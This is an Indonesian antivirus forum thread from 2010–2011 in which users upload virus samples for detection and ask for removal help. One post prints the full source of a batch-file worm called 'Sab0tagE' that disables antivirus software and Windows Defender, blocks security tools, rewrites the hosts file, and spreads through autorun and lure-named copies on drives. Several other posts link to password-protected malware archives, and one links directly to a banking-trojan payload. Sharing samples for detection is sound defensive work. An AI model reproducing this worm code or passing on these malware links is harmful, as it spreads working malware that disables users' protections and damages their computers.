tapi cuma flashdiscnya doank FD gw ga  :o
udah di scan pake SMADAV PRO ma NIS masih tetap sama  :o
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: s4nji pada Oktober 28, 2010, 08:54:02 PM
@up & up up
Itu nama file doang n ga nyebar ke HDD kan? Cuma di FD kan?
Kalo iya, FDnya yang korup :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Oktober 28, 2010, 09:39:09 PM
@up & up up
Itu nama file doang n ga nyebar ke HDD kan? Cuma di FD kan?
Kalo iya, FDnya yang korup :P
wuahhhhhh ternyata emang FD nya yg corupt ya  :o
tapi koq isi yg di dlm Flash biasa2 aja koq s4n???
kan tadi gw copy software ke FD teman tuh tapi jadi tulisan aneh2 gitu dan memang cuma FD tuh doank  ;>
jadi FD yg corrupt ya  ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ydded pada Oktober 29, 2010, 01:06:27 PM
iya itu dari linux abis males colok lagi ke windows...  ~x( ~x( ~x( gimana solusinya ??? ada yang bisa bantu ?? ^:)^ ^:)^ ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 29, 2010, 01:47:27 PM
ni ada koleksi  :D

http://www.sendspace.com/file/iweje8

pass.nya :1234
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Oktober 29, 2010, 04:00:31 PM
http://www.ziddu.com/download/12289254/Virus_Tongji.zip.html
http://www.ziddu.com/download/12289337/Virus_pp-Email.zip.html

Sama-sama virus HTML infector, SmadAV pasti bakalan gampang dalam memFixnya, gak kayak Avira asal hapus....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Oktober 29, 2010, 04:09:35 PM
Vir apa ya?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: priana pada Oktober 30, 2010, 02:32:55 AM
tolong gan gimana caranya ngatasin ni virus... udah diformat n diinstal ulang malah gak bisa baca CD office gan..
ane harus gmn nih...?? tuluuuuuuuuuuuunk  :'( :'( :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada Oktober 30, 2010, 03:45:37 AM
tolong gan gimana caranya ngatasin ni virus... udah diformat n diinstal ulang malah gak bisa baca CD office gan..
ane harus gmn nih...?? tuluuuuuuuuuuuunk  :'( :'( :'(
open with notepad
Kode: [Pilih]
@echo off
Title smartp-0
Mode con lines=1
For %%A in (%0) do if not "%%~zA"=="5326" exit

REM Name   : [Sab0tagE]
REM Author : Silver FoX

if "%1"=="" (
if exist hide.vbs del /a /f hide.vbs>nul
Call :Hide >>hide.vbs
start wscript.exe hide.vbs
exit
)

del /a /f hide.vbs

SET regs=SOFTWARE\POLICIES\MICROSOFT
set rege=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION
set reged=Software\Microsoft\Windows NT\currentversion
set sysrt=%systemroot%\system32\drivers\etc\hosts
Set fb=facebook&&Set auto=%random%
Set Burn=%UserProfile%\Local Settings\Application Data\Microsoft\CD Burning
If /i "%SystemRoot%"=="C:\Windows" (
For /r C:\WINDOWS %%G in (msvbvm60.dll) do if exist "%%G" Ren "%%G" "%%~nG.%random%"
) Else (
For /r C:\WINNT %%G in (msvbvm60.dll) do if exist "%%G" Ren "%%G" "%%~nG.%random%"
)
net share system=%systemdrive%\ /unlimited
For %%c in (mcshield avp32 avp antivir mcafee norton  f-prot95 f-stopw navwnt navrunr navlu32 rescue32 navw32 navapw32 avsynmgr avconsol) do net stop %%c

:REGISTRY
REG ADD HKCR\Network\SharingHandler /ve /d "" /f
REG ADD HKLM\%rege%\RUN /V Sab0tagE /D "%systemroot%\sfx.cmd" /F
REG ADD "HKCU\%regs%\WINDOWS\SYSTEM" /V DisableCMD /T REG_DWORD /D 2 /F
Reg Add HKLM\%rege%\Policies\System /v EnableLUA /t reg_dword /d 0 /f
For %%a in (RegistryTools TaskMgr MsConfig) do Reg Add HKLM\%rege%\Policies\System /v Disable%%a /t reg_dword /d 1 /f
REG ADD "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinDefend" /V "Start" /T REG_DWORD /D 4 /F
For %%A in (PCMAV PCMAV-CLN PCMAV-RTP avid ansav ansavgd ansav32) do REG ADD "HKLM\%reged%\IMAGE FILE EXECUTION OPTIONS\%%A.exe" /v Debugger /D "cmd.exe /c del /f /a" /f
For %%B in (regedit regedt32 taskmgr msconfig mmc rstrui msiexec tskill taskkill) do REG ADD "HKLM\%reged%\IMAGE FILE EXECUTION OPTIONS\%%B.exe" /v Debugger /D "rundll32.exe" /f
REG ADD HKCU\%rege%\EXPLORER\ADVANCED /V SHOWSUPERHIDDEN /T REG_DWORD /D 0 /F
For %%a in (FolderOptions Find) do REG ADD HKCU\%rege%\POLICIES\EXPLORER /V No%%a /T REG_DWORD /D 1 /F
REG ADD HKCU\%rege%\EXPLORER\ADVANCED /V HideFileExt /T REG_DWORD /D 1 /F
REG ADD HKCU\%rege%\EXPLORER\ADVANCED /V HIDDEN /T REG_DWORD /D 0 /F
REG ADD HKCR\Software\Classes\cmdfile /v NeverShowExt /T REG_DWORD /D 1 /F
REG ADD HKLM\Software\Classes\cmdfile /ve /D "File Folder" /F
REG ADD "HKLM\Software\Classes\cmdfile\Default Icon" /ve /D "shell32.dll, 3" /F
REG ADD HKLM\Software\Classes\regfile\shell\merge\command /ve /D "logoff.exe" /f
REG ADD HKLM\Software\Classes\inffile\shell\install\command /ve /D "logoff.exe" /f
REG ADD HKLM\Software\Classes\vbsfile\shell\open\command /ve /D "logoff.exe" /f
REG ADD HKLM\Software\Classes\batfile\shell\edit\command /ve /D "logoff.exe" /f
REG ADD HKLM\Software\Classes\cmdfile\shell\edit\command /ve /D "logoff.exe" /f
REG ADD "HKU\.DEFAULT\Control Panel\Desktop" /V AutoEndTasks /T REG_DWORD /D 1 /F

:CHECKING
If not exist "%systemroot%\sfx.cmd" (
Cd /d "%systemroot%"
Copy %0 sfx.cmd
Attrib +s +h +r sfx.cmd
Start sfx.cmd
Exit
)
If exist "%ProgramFiles%\VMWare" (
cd /d "%ProgramFiles%\VMWare\VMware Server"
start vmware-cmd "%SystemDrive%\Virtual Machines\Win2000Pro\Windows 2000 Professional.vmx" stop
start vmware-cmd "%SystemDrive%\Virtual Machines\WinXP\Windows XP Professional.vmx" stop
)
If not exist %systemdrive%\SABOTAGE.TXT (
Echo Your computer has been SABOTAGEd>%systemdrive%\SABOTAGE.TXT
Echo Where's your AV when you need one?>>%systemdrive%\SABOTAGE.TXT
Echo.>>%systemdrive%\SABOTAGE.TXT
Echo Silver FoX - Lampung Underground>>%systemdrive%\SABOTAGE.TXT
)
If not exist "%Burn%\autorun.inf" (
Copy "%0" "%Burn%\%auto%.bat" /y
Echo [autorun]>"%Burn%\autorun.inf"
Echo Open=%auto%.bat>>"%Burn%\autorun.inf"
Echo ShellExecute=%auto%.bat>>"%Burn%\autorun.inf"
)

Type %sysrt% | find /i "sab0tage"
If errorlevel 1 Call :Host >> %sysrt%

If /i not "%cd%"=="%SystemRoot%" exit

:SEED
For %%p in (E F G H I J K L M N O) do if exist %%p:\ (
copy %0 "%%p:\%auto%.bat" /y
If not exist %%p:\%fb% md %%p:\%fb%
For %%q in ("Cewek Bugil" "Cracker" "Password Gue" "Lampung Underground" "Password Hacking" "pencuri login" "Kumpulan Foto Sexy") do copy %0 %%p:\%fb%\%%q.bat /y
)

if exist d:\ (
For /d d:\ %%c in (*) do Copy %0 "%%c\%%~nc.cmd" /y
)

cd /d "%SystemRoot%"
Call :Hide >>hide.vbs
start wscript.exe hide.vbs
Exit

:Hide
echo set ws = wscript.CreateObject("Wscript.Shell")
echo ws.run("cmd.exe /c " ^& Chr(34) ^& "%~nx0" ^& Chr(34) ^& " hide"), vbhide
goto :End

:HoSt
echo # Sab0tagE
echo 168.143.162.116 www.jasakom.com
echo 203.190.112.22 jasakom.com
echo 209.11.168.112 www.facebook.com
echo 209.11.168.112 facebook.com
echo 216.163.137.68 www.vaksin.com
echo 216.163.137.68 vaksin.com
echo 216.163.137.68 www.virusindonesia.com
echo 216.163.137.68 virusindonesia.com
echo 216.178.38.116 www.threatexpert.com
echo 216.178.38.116 threatexpert.com
echo 216.178.38.116 www.virustotal.com
echo 216.178.38.116 virustotal.com
echo 202.158.66.92 google.com
echo 168.143.162.116 www.smadav.net
echo 168.143.162.116 smadav.net
echo 202.146.4.72 www.virus4.com
echo 202.146.4.72 virus4.com
echo 216.163.137.68 www.infokomputer.com
echo 216.163.137.68 infokomputer.com
echo 216.163.137.68 www.ansav.com
echo 216.163.137.68 ansav.com
goto :End

:End
VirusTotal (http://www.virustotal.com/file-scan/report.html?id=2b60889432253fb3219ea79047ce12cd92b14ca7fca95a382acbdcdcbe54739d-1288384730)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: chiezndutt pada Oktober 31, 2010, 09:04:08 AM
ini virus bukan, soalnya ini yg buat kmpter sy lemot dan hang terus
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Oktober 31, 2010, 09:17:08 AM
ini virus bukan, soalnya ini yg buat kmpter sy lemot dan hang terus
ESS4 mendeteksinya sbg Win32/Wigon.KQ trojan
liat attachment dibawah ini...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada Oktober 31, 2010, 09:19:58 AM
ini virus bukan, soalnya ini yg buat kmpter sy lemot dan hang terus

Terdetek sama avast sbgai win 32 ROOTkit rrti tu virus n brbhaya \m/ \m/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: chiezndutt pada Oktober 31, 2010, 09:26:18 AM
klo wuaucldt.exe ? itu g bsa sy masukin smadav, cz filenya g ktmu
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Azwar Azmo pada November 01, 2010, 05:18:23 PM
bro, rtp dipasang ke komputerku kok gag bisa???  :(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hizkia anak Tugib pada November 01, 2010, 08:37:59 PM
@G tw

ada Vir baru anakan Aksika neeh linknnya
http://smadaver.com/konsultasi-virus/new-virus/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Abie_Mahardika pada November 03, 2010, 06:52:40 PM
 ~x( pusing ne bos,..muncul terus New Heur.Level(9) ga bisa dihapus
mohon solusi'y kasian ne laptop sakit'y ga sembuh2
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hizkia anak Tugib pada November 03, 2010, 08:35:29 PM
hmmm pke AVG + SMADAV PRO
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Deny MiniDwarf pada November 04, 2010, 08:21:50 AM
bro, rtp dipasang ke komputerku kok gag bisa???  :(
gak bisa nya gimana?
MAsuk dimari:http://smadaver.com/konsultasi-virus/rtp-smadav-dipasang-di-pc-kok-gag-bisa/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hizkia anak Tugib pada November 04, 2010, 03:30:02 PM
bro ada vir bru mantap
http://smadaver.com/konsultasi-virus/vir-baru-yg-jahat/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ilham29 pada November 04, 2010, 07:13:55 PM
~x( pusing ne bos,..muncul terus New Heur.Level(9) ga bisa dihapus
mohon solusi'y kasian ne laptop sakit'y ga sembuh2
pake normanx malware cleaner
link Censored takut ane kasih link na entar di bata para mumuds  :(  :(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hizkia anak Tugib pada November 05, 2010, 11:54:57 AM
ada Vir baru
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada November 05, 2010, 12:17:46 PM
~x( pusing ne bos,..muncul terus New Heur.Level(9) ga bisa dihapus
mohon solusi'y kasian ne laptop sakit'y ga sembuh2
pake normanx malware cleaner
link Censored takut ane kasih link na entar di bata para mumuds  :(  :(

woe g papa lo norman malware cleaner bro kan bkn Piracy..... :-\ ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada November 05, 2010, 01:14:25 PM
ada Vir baru
kena razia ESS4...
tersangka ada di attachment
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: krebot pada November 09, 2010, 11:47:32 AM
coba cek ini : hxxp://hostuje.net/file.php?id=a697eba35bebfd5361c6d9c48631f003

password: infected.

100 virus terbaru [klo ngak salah ya]

dan ini : http://hotfile.com/dl/76812399/98f799e/00.rar.html (http://hotfile.com/dl/76812399/98f799e/00.rar.html)

tapi ingat filenya gede-gede... ^_^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada November 10, 2010, 08:29:22 AM
Sensored :D
btw mo2d pada kemana ya???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada November 10, 2010, 08:42:41 AM
btw mo2d pada kemana ya???

iya nih bro, kok g di BANNED aja ya tuh bule sialan
sama gua minta emailnya yg buat registrasi, mau gua CACI MAKI tuh bule g tau diri
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada November 10, 2010, 10:58:20 AM
Dah dibanned :)

back to topic
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada November 10, 2010, 11:25:34 AM
lapor td ada virus trdeteksi oleh avast yaitu virus2 yg mrubah mp 3 jd exe....
avast tdk bsa mnghapus...... :-X :-X :P
smadav nyantai tdk mndeteksi...... ;>
bahkan norman malware cleaner diam saja tdk bsa ndetek ato papun... ~x(
Namun akhirx sang jawara baru Mwav (escan removal )
skli lg brhasil mlkukan tgasx dgn baik dan mncetak angka 100 - 0....... :-bd :-bd :-bd :-X :-X :-X
brhasil mnghapus virus mp3 trsebut...... ^:)^ =)) \m/
mf sample tdk smpat diambil....... :D :D :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada November 10, 2010, 12:01:35 PM
@tirta, file mp3 aslinya kehapus jg gak?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada November 10, 2010, 12:25:25 PM
ini sepertinya virus luar, menyamar dengan icon seperti Recycle Bin...

http://www.sendspace.com/file/n1g01m

pass. nya : 1234
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada November 10, 2010, 12:32:04 PM
ini sepertinya virus luar, menyamar dengan icon seperti Recycle Bin...

http://www.sendspace.com/file/n1g01m

pass. nya : 1234
pas ane extract, kena sergapan NIS2011 bro...(update hari ini)
liat tersangka di attachment...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Metamorphic pada November 10, 2010, 12:45:42 PM
ini sepertinya virus luar, menyamar dengan icon seperti Recycle Bin...

http://www.sendspace.com/file/n1g01m

pass. nya : 1234

Avast5.0 mendetek win32.trojan.gen =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada November 10, 2010, 01:43:51 PM
@tirta, file mp3 aslinya kehapus jg gak?

sepertinya tidak,..... :-bd :-bd :-bd krn aq mnmukanx dflashdisk org.... :-bd
jd stlah ddelete udh g q liatin lgnsng q ksiin orgx.slsai..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada November 10, 2010, 06:01:13 PM
Nih link trojan banker  :D

Kode: [Pilih]
http://webpresencamaster.com/Syst.jpg
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada November 11, 2010, 08:55:56 AM
Mohon bantuan untuk menghapus virus ini. Kira-kira Ini virus apa ya?.
Tidak terdeteksi Smadav 8.3 sebagai virus.
Hanya file wuaucldt.exe ini yang terdeteksi sebagai virus.
Lokasi file ini di C:Document and Setting,salah satu user account.
Sudah format windows, tetapi muncul lagi.
Terima kasih. :)

maaf lo upload harap dizip ato dcompress dn winrar
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: samsung pada November 11, 2010, 11:35:54 AM
maaf,,,sekarang sudah di rar
Mohon bantuan untuk menghapus virus ini. Kira-kira Ini virus apa ya?.
Tidak terdeteksi Smadav 8.3 sebagai virus.
Hanya file wuaucldt.exe ini yang terdeteksi sebagai virus.
Lokasi file ini di C:Document and Setting,salah satu user account.
Sudah format windows, tetapi muncul lagi.
Terima kasih. Smiley
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada November 11, 2010, 12:11:06 PM
maaf,,,sekarang sudah di rar
Mohon bantuan untuk menghapus virus ini. Kira-kira Ini virus apa ya?.
Tidak terdeteksi Smadav 8.3 sebagai virus.
Hanya file wuaucldt.exe ini yang terdeteksi sebagai virus.
Lokasi file ini di C:Document and Setting,salah satu user account.
Sudah format windows, tetapi muncul lagi.
Terima kasih. Smiley
itu adlah virus win 32 virut terdeteksi oleh avast dan tdk bsa dhpus....
sbaiknya gunkan norman malware cleaner ato instal ulang trus scan smua drive dgn norman malware cleaner ato mwav ato pke virut killer dr kaspersky :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada November 14, 2010, 09:22:20 AM
udah di scan pake smadav terbaru, tp blm ke-ditek...

afaik, nih piruz nge-rubah file hosts mulu....dan demen nge-rubah settingan Folder option juga
akibatnya, ane kagak bisa pake software yg mengakses ke server LAN.... =)) =)) =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada November 15, 2010, 04:53:15 AM
maaf,,,sekarang sudah di rar
Mohon bantuan untuk menghapus virus ini. Kira-kira Ini virus apa ya?.
Tidak terdeteksi Smadav 8.3 sebagai virus.
Hanya file wuaucldt.exe ini yang terdeteksi sebagai virus.
Lokasi file ini di C:Document and Setting,salah satu user account.
Sudah format windows, tetapi muncul lagi.
Terima kasih. Smiley
Kedetec Virus Virut.ce oleh KIS 2011 database hari ini :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada November 15, 2010, 05:07:41 AM
udah di scan pake smadav terbaru, tp blm ke-ditek...

afaik, nih piruz nge-rubah file hosts mulu....dan demen nge-rubah settingan Folder option juga
akibatnya, ane kagak bisa pake software yg mengakses ke server LAN.... =)) =)) =))
malware ;> detek by AVAST 5
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada November 15, 2010, 07:28:57 AM
udah di scan pake smadav terbaru, tp blm ke-ditek...

afaik, nih piruz nge-rubah file hosts mulu....dan demen nge-rubah settingan Folder option juga
akibatnya, ane kagak bisa pake software yg mengakses ke server LAN.... =)) =)) =))
malware ;> detek by AVAST 5
yups...betul bro...sebelumnya ane juga uda scan pake av luar terupdate bisa ke-ditek...
tapi pas pake smadav nothing found bro... :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hardian12 pada November 24, 2010, 01:37:12 PM
Aku ada virus nih, sudah di upload pada menu upload smadav.net nama filenya aneh.rar, tapi bagaimana caranya saya tahu kalau virus tersebut sudah ada antivirusnya ? mohon di tambahkan alamat email yang upload, agar nanti di kabari apabila virusnya sudah dibuatkan antivirusnya

salam


hardian
nb. aku upload lagi di forum ini
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada November 24, 2010, 07:37:04 PM
Aku ada virus nih, sudah di upload pada menu upload smadav.net nama filenya aneh.rar, tapi bagaimana caranya saya tahu kalau virus tersebut sudah ada antivirusnya ? mohon di tambahkan alamat email yang upload, agar nanti di kabari apabila virusnya sudah dibuatkan antivirusnya

salam


hardian
nb. aku upload lagi di forum ini
VirusTotal (http://www.virustotal.com/file-scan/report.html?id=ae71073499b4663249cfbe6ab00636fcd84eef92da7ca4946ed616010e0cb201-1290600962)
COMODO AV FREE. sudah bisa detek  :D
http://www.comodo.com/home/internet-security/antivirus.php
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada November 26, 2010, 12:15:52 PM
Aku ada virus nih, sudah di upload pada menu upload smadav.net nama filenya aneh.rar, tapi bagaimana caranya saya tahu kalau virus tersebut sudah ada antivirusnya ? mohon di tambahkan alamat email yang upload, agar nanti di kabari apabila virusnya sudah dibuatkan antivirusnya

salam


hardian
nb. aku upload lagi di forum ini

bisa kedetek sama morphost, tapi sebagai file "dugaan virus" dengan nama Malware.IDB-1 

dengan keterangan: file ini berpotensi Malware
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: rudolf310 pada November 26, 2010, 12:39:29 PM
gan ada virus shortcut
http://www.virustotal.com/file-scan/report.html?id=c7d67570793981bc6acc8d9cc8b4f0d0f2174b8c0c792756db181ae2834f340d-1290749989
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada November 30, 2010, 10:01:39 AM
Virus datang: http://www.ziddu.com/download/12757145/upload-awnq-virus_bkb.zip.html (http://www.ziddu.com/download/12757145/upload-awnq-virus_bkb.zip.html)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: somersault11 pada November 30, 2010, 02:44:06 PM
Di detect w32.stutnex! ma norton,, smadav =  flashdisk anda bersih, like always..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada Desember 02, 2010, 07:45:43 AM
nih trojan cuma sedikit av yang bisa detek  :D :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Desember 02, 2010, 08:01:20 AM
nih trojan cuma sedikit av yang bisa detek  :D :P
NIS2011 dah mengenalinya bro... :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada Desember 02, 2010, 08:10:10 AM
nih trojan cuma sedikit av yang bisa detek  :D :P
NIS2011 dah mengenalinya bro... :-bd
ESS gw belum bisa detek tuh  =)) w pakai 2AV ESS sama COMODO yang detek cuma comodo  ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Desember 02, 2010, 08:11:32 AM
nih trojan cuma sedikit av yang bisa detek  :D :P
NIS2011 dah mengenalinya bro... :-bd
ESS gw belum bisa detek tuh  =)) w pakai 2AV ESS sama COMODO yang detek cuma comodo  ;>
yoi bro...tadi jg udah ane coba pake ESS4 update hari ini..tp msh nihil hasilnya....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada Desember 02, 2010, 06:07:13 PM
Wah belum di detek ESS 4? Krm sampelnya ke mereka d0ng, biar ditambahin
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Desember 02, 2010, 06:17:24 PM
Wah belum di detek ESS 4? Krm sampelnya ke mereka d0ng, biar ditambahin
update hari ini , uda bisa di deteksi ESS4 bro....

ini dia tersangkanya:
(http://i53.tinypic.com/35co6eb.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: krebot pada Desember 03, 2010, 09:52:09 AM
gw terkadang binggung, maw upload virus tapi kebanyakan dari luar smua, truz teman2 pun spertinya kebanyakan upload virus dari luar jg, kita mau fokus upload virus yg dari luar atau dari dalam negeri saja ya???

binggung oh binggung
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: tyaslovesedu pada Desember 04, 2010, 10:28:54 PM
mas ak memang msh pemula tp berani coba2...kmrn krn scan pke smadav terdeteksi laptop ak ad virus ak download AV bnyk2 trus ak upload virus k smadav....eh jd system windows d laptop ak gk bisa mas....tolong bgt y bls secepatnya....
ak gk bs refresh, shutdown, buka control panel dll....
bingung n stress mas...
tks y utk bantuannya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Reyɦαɳ Iɳsiᶑe ! ┌П┐ pada Desember 19, 2010, 07:11:50 AM
coba di masukin database.y smadav

klo d klik lngsung menyebar ke seluruh HDD

ni ada dua,yaitu,My Name Is Yuyun & BACA AQ

Tingkat Bahaya: Low
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada Desember 19, 2010, 07:30:50 AM
coba di masukin database.y smadav

klo d klik lngsung menyebar ke seluruh HDD

ni ada dua,yaitu,My Name Is Yuyun & BACA AQ

Tingkat Bahaya: Low
isi virus seperti ini:  :D
Yuyun Ver 1.0 ^_^!==================

Bukan dari tulang ubun ia dicipta
karna berbahaya membiarkannya dalam sanjung dan puja
tak juga dari tulang kaki
karna nista membuatnya diinjak dan diperbudak
tapi dari tulang rusuk bagian kiri
dekat ke hati untuk disayangi
dekat ke tangan untuk dilindungi

(dikutip dr: Agar Bidadari Cemburu Padamu)


"Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah
orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman."
(QS. Ali Imran:139)


Katakanlah kepada orang laki-laki yang beriman: "Hendaklah mereka menahan pandanganya,
dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka,
sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat." (QS. An Nur:30)

Katakanlah kepada wanita yang beriman: "Hendaklah mereka menahan pandangannya,
dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang
(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung
kedadanya...." (QS. An Nur:30)

Sorry I just Nitip Print thok....Ndak pa2 khan^_^!  www.muslimah.or.id

Hai anak Adam, sesungguhnya Kami telah menurunkan kepadamu
pakaian untuk menutup auratmu dan pakaian indah untuk perhiasan.
Dan pakaian takwa itulah yang paling baik. Yang demikian itu adalah
sebahagian dari tanda-tanda kekuasaan Allah, mudah-mudahan mereka selalu ingat.(Al-A'raf:26)

VirusTotal (http://www.virustotal.com/file-scan/report.html?id=a109e99a22ad300bca8ddecc36fb96b9ebd49c934b1cb29e5fecec62bdfab473-1292718365)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: HezekiahSoft pada Desember 21, 2010, 10:10:04 AM
http://www.ziddu.com/download/13060629/Me.EXE.html

Baru Bikin Virus

Tapi udh diinfeksi Oleh SMADAV sebagai VBS.kalong.C
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Desperados pada Desember 25, 2010, 08:10:59 PM
intinya selama malcode yg dibuat dg metode berformat "*.vbs" dan msh mggunakan "wscript.exe" maka akan terjaring oleh antivirus... ini termasuk uniquely string untuk menjaring malcode berbentuk shortcut(harry potter) tapi untuk jenis/variant lama bukan yang baru lho...  ;) :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: akai pada Desember 29, 2010, 09:30:57 AM
kang aku punya virus bandel nih tapi pke antivirus norton , AVG, juga ga bisa ilang virusnya pke formatan PIF gtu binggung aku ngilanginya mohon bantuannya senior :'( :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: agus_suardana pada Desember 29, 2010, 10:09:13 AM
nama virus ny ap gan.?
oya smoga ini bisa membantu ngilangin virus itu www.morphostlab.co.nr
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Desperados pada Desember 29, 2010, 11:46:28 PM
kang aku punya virus bandel nih tapi pke antivirus norton , AVG, juga ga bisa ilang virusnya pke formatan PIF gtu binggung aku ngilanginya mohon bantuannya senior :'( :'(
coba pake antivirus karya anak bangsa dulu..misal
PCMAV
CMC PH 3.5
SMADAV
MorphostAV

klo mau yang import ya pake
AVAST Free Ver 5 itu lumayan galak n bagus
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: frey pada Desember 31, 2010, 03:07:45 PM
nih virus apaan om ?


========================
EDITED
========================

Setelah saya Scan pake MSE, terbaca 2 varian ini :

VirTool:Win32/Obfuscator.KX
Backdoor:Win32/IRCbot.gen!K


mohon bantuan untuk cara penanggulangan "makhluk" ini
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: HezekiahSoft pada Januari 05, 2011, 10:14:02 AM
ini virus nyeselin bgt
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Januari 13, 2011, 11:43:48 PM
PAK BOS TOLONG BANTUIN DONG,VIRUS APA INI.AKU DAPETNYA WAKTU CONEK KE INTERNET. :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada Januari 14, 2011, 12:18:39 AM
PAK BOS TOLONG BANTUIN DONG,VIRUS APA INI.AKU DAPETNYA WAKTU CONEK KE INTERNET. :'(
;) avast detek sabagai Win32:vitro
               norton                            :virut.cf
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: arisrisyandi pada Januari 15, 2011, 12:53:16 PM
jawara" virus sekalian... saya mohon pencerahannya dari virus yang melekat di kompi saya
sy pake smadav dan terdetek sebagai jenis " newheur.level(9) " itu virus muncul lagi muncul lagi
imut bgt lah  :'( :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: HezekiahSoft pada Januari 15, 2011, 12:57:40 PM
jawara" virus sekalian... saya mohon pencerahannya dari virus yang melekat di kompi saya
sy pake smadav dan terdetek sebagai jenis " newheur.level(9) " itu virus muncul lagi muncul lagi
imut bgt lah  :'( :'(
heehe new heur level 9
pake sality killer aj
caranya
1,delete File new heur level 9 dengan SMADAV
2.Download Sality Killer (http://www.kaspersky.com/downloads/utils/salitykiller.zip)
3.jangan Extract File Tersebut
4.Ubah Nama Sality Killer.exe menjadi Autorun.exe (Didalam Zip Tersebut)
5.Buka File
6.Tunggu Scan semua disk Hingga selesai
7.download antivirus impor

Nah itu Caranya Selamat Mencoba
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: arisrisyandi pada Januari 15, 2011, 01:23:54 PM
om .. berhubung saya pake koneksi internet. apa harus di matiin dulu koneksinya baru saya mulai bedah ntu virus ? apa gmn bagusnya ??

